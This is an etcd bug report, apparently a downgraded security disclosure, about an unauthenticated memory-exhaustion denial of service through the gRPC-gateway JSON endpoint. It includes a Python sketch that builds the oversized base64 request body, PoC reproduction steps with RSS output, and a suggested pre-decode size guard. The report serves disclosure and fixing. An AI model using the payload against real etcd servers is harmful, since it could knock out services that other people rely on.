Bug report criteria
What happened?
(Duplicating my original security report below; per discussion on our email chain, this will be handled as a non-security bug report.)
Summary
A remote unauthenticated attacker can trigger large, retained memory allocations in etcd by sending an oversized HTTP/JSON request body to the gRPC-gateway endpoint (for example /v3/kv/range). This can lead to memory-exhaustion DoS and a potential OOM/service outage, since memory use grows to ~7x the size of the attacker's payload.
Details
etcd enables the gRPC-gateway HTTP API under /v3/ by default. The gateway decodes JSON requests containing base64-encoded byte fields. By sending an extremely large base64 string, an attacker can force etcd to allocate a very large heap (GiB-scale observed) even when the request is unauthenticated.
In the PoC below, a single unauthenticated 256 MiB HTTP/JSON request to /v3/kv/range caused etcd's RSS to increase by ~1.75 GiB (~7x the request body size) and to remain elevated at that level for at least 10 seconds after the request completed, even though the server returned HTTP/1.1 429 Too Many Requests.
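As a rough sketch of the request shape (sizes scaled down from the PoC's 256 MiB; the `key` field name follows the gRPC-gateway JSON mapping for the KV range request):

```python
import base64
import json

# Scaled-down illustration of the oversized request body; the real PoC
# uses a ~256 MiB base64 string (base64_key_len=268435456).
B64_KEY_LEN = 1 << 20  # 1 MiB of base64 text instead of 256 MiB

raw = b"A" * (B64_KEY_LEN * 3 // 4)  # base64 expands its input by 4/3
b64_key = base64.b64encode(raw).decode("ascii")
body = json.dumps({"key": b64_key}).encode("ascii")

# `body` would be POSTed to http://127.0.0.1:2379/v3/kv/range; the
# gateway JSON-decodes the body and then base64-decodes `key`, so the
# server transiently holds multiple copies of attacker-controlled data.
print(len(b64_key), len(body))
```

Scaling B64_KEY_LEN to 268435456 reproduces the request the attached script sends.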
Impact
Unauthenticated remote memory-exhaustion DoS against etcd client endpoints that are reachable by the attacker. This is especially impactful for containerized deployments with tight memory limits.
Suggested severity: High, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (7.5)
What did you expect to happen?
etcd should enforce request-size limits (e.g., --max-request-bytes) before unmarshalling the JSON body, preventing the attacker from a) driving that much memory allocation directly via the request and b) amplifying the usage ~7x.
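A pre-decode guard could be as simple as comparing the declared Content-Length against the configured limit before the body is read. This is a hypothetical sketch, not etcd code; `reject_oversized` is an illustrative name, and the 1.5 MiB constant mirrors the documented --max-request-bytes default:

```python
# Hypothetical pre-decode guard; etcd would apply its existing
# --max-request-bytes limit at this point, before JSON unmarshalling.
MAX_REQUEST_BYTES = 1572864  # 1.5 MiB

def reject_oversized(content_length, limit=MAX_REQUEST_BYTES):
    """Return True if the request should be refused before any JSON
    unmarshalling or base64 decoding touches the body."""
    # Requests without a declared length (e.g. chunked) would need a
    # streaming cap instead; rejecting them here is the conservative choice.
    if content_length is None:
        return True
    return content_length > limit

# The PoC's 256 MiB body would be refused up front:
print(reject_oversized(268435456))  # True
print(reject_oversized(1024))       # False
```

With such a check, the oversized request is dropped before it can drive any large allocations.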
How can we reproduce it (as minimally and precisely as possible)?
PoC
repro-http-huge.py
1. Adjust the attached PoC to point at the right paths for ETCD_BIN (see the top-level const definitions for other tunables too).
2. Run python ./repro-http-huge.py
3. Expected output:
*** LAUNCH A FRESH SINGLE-NODE ETCD FOR THE HTTP GATEWAY MEMORY TEST ***
$ /usr/local/bin/vh-etcd --name vh1 --data-dir /tmp/vh-repro-etcd-f001-data --listen-client-urls http://127.0.0.1:2379 --advertise-client-urls http://127.0.0.1:2379 --listen-peer-urls http://127.0.0.1:2380 --initial-advertise-peer-urls http://127.0.0.1:2380 --initial-cluster vh1=http://127.0.0.1:2380 --initial-cluster-state new --log-level info
*** CAPTURE BASELINE RSS BEFORE THE OVERSIZED HTTP/JSON REQUEST ***
rss_before_kib=29816
*** SEND ONE OVERSIZED HTTP/JSON REQUEST TO /V3/KV/RANGE ***
target=http://127.0.0.1:2379/v3/kv/range
base64_key_len=268435456
status_line=HTTP/1.1 429 Too Many Requests
*** CAPTURE RSS 10 SECONDS AFTER THE OVERSIZED REQUEST ***
rss_after_kib=1869404
rss_delta_kib=1839588
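One way to capture RSS numbers like the above (an assumption about the measurement method, shown for completeness; the helper name is illustrative) is to parse the VmRSS line from /proc/&lt;pid&gt;/status:

```python
def parse_vmrss_kib(status_text: str) -> int:
    """Extract the VmRSS value (in KiB) from /proc/<pid>/status content."""
    for line in status_text.splitlines():
        if line.startswith("VmRSS:"):
            # Line looks like: "VmRSS:     29816 kB"
            return int(line.split()[1])
    raise ValueError("no VmRSS line found")

# Example matching the baseline capture above:
sample = "Name:\tetcd\nVmRSS:\t   29816 kB\n"
print(parse_vmrss_kib(sample))  # 29816
```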
Anything else we need to know?
No response
Etcd version (please run commands below)
Reproduced on etcd 3.6.7, 3.6.8, and main at commit c3aff5680d237116bcf1fe59d4a90eea93add2c7.
Etcd configuration (command line flags or environment variables)
No response
Etcd debug information (please run commands below, feel free to obfuscate the IP address or FQDN in the output)
No response
Relevant log output